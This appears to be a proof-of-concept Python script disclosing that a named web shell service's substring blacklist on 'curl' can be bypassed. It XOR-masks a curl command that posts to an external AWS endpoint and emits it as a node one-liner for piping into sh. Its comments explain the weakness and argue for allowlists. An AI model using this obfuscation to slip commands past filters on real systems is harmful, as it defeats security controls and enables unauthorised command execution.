http://www.lambdashell.com/ uses `command.includes('curl')` to blacklist curl. Such a substring check can be bypassed by piping the output of this script into `sh`.
from random import choices, seed
from sys import argv

# Proof-of-concept against a substring blacklist (`command.includes('curl')`):
# the shell command below is XOR-masked byte by byte and emitted as a
# `node -e` one-liner that unmasks it at run time, so the literal text
# "curl" never appears in what gets submitted.
# NOTE(review): the masking is not secrecy. Both the masked bytes and the
# mask are printed in the clear inside the one-liner, so anyone who logs or
# inspects the submitted command recovers the original with one XOR pass.
# For the receiving side the takeaway is that a substring denylist is not a
# meaningful control; an allowlist, or not handing input to a shell, is.
payload = b'''curl -v -X POST -H 'Content-Type: application/json' -d '{command: "echo \\"place here another CURL to a server that will return a newly encoded cmd to tie the knot\\""}' https://yypnj3yzaa.execute-api.us-west-1.amazonaws.com/dev'''

# `random.seed` is deterministic: the same argv[1] always yields the same
# mask. Running the script without an argument raises IndexError here.
seed(argv[1])

# One mask value in 0..255 per payload byte. `random` is a PRNG, not a
# CSPRNG; that does not matter here because the mask is emitted alongside
# the masked data anyway.
mask = choices(range(256), k=len(payload))
masked = [byte ^ mask[i] for i, byte in enumerate(payload)]

# Python's list repr is a valid JS array literal, so both lists can be
# embedded directly; the JS reverses the XOR and rebuilds the string.
unmask_js = "console.log(String.fromCharCode(...{}.map((x,i)=>x^{}[i])))".format(masked, mask)
print(f"node -e '{unmask_js}'")